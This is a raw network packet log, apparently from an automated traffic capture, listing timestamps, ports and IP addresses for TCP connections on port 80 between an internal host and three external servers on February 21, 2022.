                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698276997 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698340893 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698542118 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698554039 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698605061 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698652983 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698729992 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698781967 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698815107 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698879004 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698954105 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.698987961 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.699011087 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.699055910 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.699090004 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.699192047 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.699285984 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.699480057 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700242996 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700293064 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700352907 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700396061 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700428009 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700460911 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700469017 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700505972 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700541973 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.700737000 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.798731089 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.798799038 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.798832893 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.799258947 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.800573111 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.800869942 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.800939083 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.800993919 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.801031113 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.801320076 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.802200079 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.802279949 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.802314997 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.803761005 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.803809881 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.803867102 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.803899050 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.803934097 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.804012060 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.804045916 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.998805046 CET4984680192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:49.019653082 CET8049846185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:49.019731045 CET8049846185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:49.019994974 CET4984680192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:49.020035028 CET4984680192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:49.094430923 CET8049846185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:49.094666958 CET4984680192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:49.259237051 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:49.259288073 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:49.259322882 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:49.259437084 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:49.259478092 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.013923883 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.024241924 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.024905920 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.026768923 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.026856899 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.026922941 CET4985080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.035768986 CET804985034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.036043882 CET4985080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.036108017 CET4985080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037064075 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037118912 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037408113 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037471056 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037568092 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037688971 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037705898 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037740946 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037777901 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037813902 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037848949 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037883997 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037883043 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.038012981 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.038233042 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.044217110 CET804985034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.047981024 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048075914 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048110962 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048273087 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048430920 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048502922 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048584938 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048619986 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048650980 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048681974 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048712015 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048742056 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048775911 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048793077 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048825979 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048856974 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.049001932 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.049010992 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.049036980 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.049180984 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.049212933 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.049343109 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.049356937 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.049376965 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.049407959 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.049539089 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.049664974 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059020996 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059082031 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059159994 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059333086 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059389114 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059520006 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059664011 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059709072 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059742928 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059776068 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059806108 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059835911 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059870005 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.059878111 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060053110 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060132980 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060167074 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060197115 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060230017 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060271978 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060323954 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060369015 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060403109 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060412884 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060530901 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060564041 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060578108 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060673952 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060760021 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060800076 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.060934067 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.061109066 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.069650888 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.070015907 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.070135117 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.070286036 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.070338964 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.070385933 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.070463896 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.070637941 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.070705891 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.070745945 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.070904970 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.070940971 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071007013 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071114063 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071177959 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071211100 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071219921 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071393967 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071582079 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071583033 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071645975 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071697950 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071753025 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071789026 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071851969 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071932077 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.071930885 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072050095 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072089911 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072105885 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072122097 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072153091 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072182894 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072212934 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072236061 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072257042 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072309017 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072362900 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072412014 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072417974 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072592020 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.072763920 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.080430031 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.080626965 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.080672026 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.080689907 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.080802917 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.080988884 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.083134890 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.083484888 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.083612919 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.088574886 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.088723898 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.093614101 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.098767042 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.103653908 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.197734118 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.197798967 CET804984934.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.198025942 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.198087931 CET4984980192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.205997944 CET804985034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.206063986 CET804985034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.206460953 CET4985080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.206557989 CET4985080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.216734886 CET804985034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.215698004 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.381295919 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.381834984 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.386236906 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.386334896 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.386518002 CET4985280192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552160978 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552246094 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552289009 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552325010 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552359104 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552423000 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552561045 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552639008 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552833080 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.553036928 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.553215981 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.556869030 CET804985245.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.557152033 CET4985280192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.557224989 CET4985280192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718252897 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718306065 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718338013 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718436956 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718512058 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718641996 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718825102 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718839884 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718907118 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718993902 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719038010 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719177008 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719276905 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719355106 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719423056 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719698906 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.719882965 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.727010965 CET804985245.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884265900 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884336948 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884370089 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884536028 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884614944 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884691000 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884854078 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884885073 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.884974003 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.885065079 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.885243893 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.885263920 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.885425091 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.885539055 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.885596037 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.885652065 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.885766029 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.885766983 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.885909081 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.886039972 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.886075020 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.886153936 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.886257887 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.886373997 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.886429071 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.886482954 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.886593103 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.886605978 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.886833906 CET4985180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.050242901 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.050292969 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.050326109 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.050658941 CET804985145.195.115.71192.168.11.20
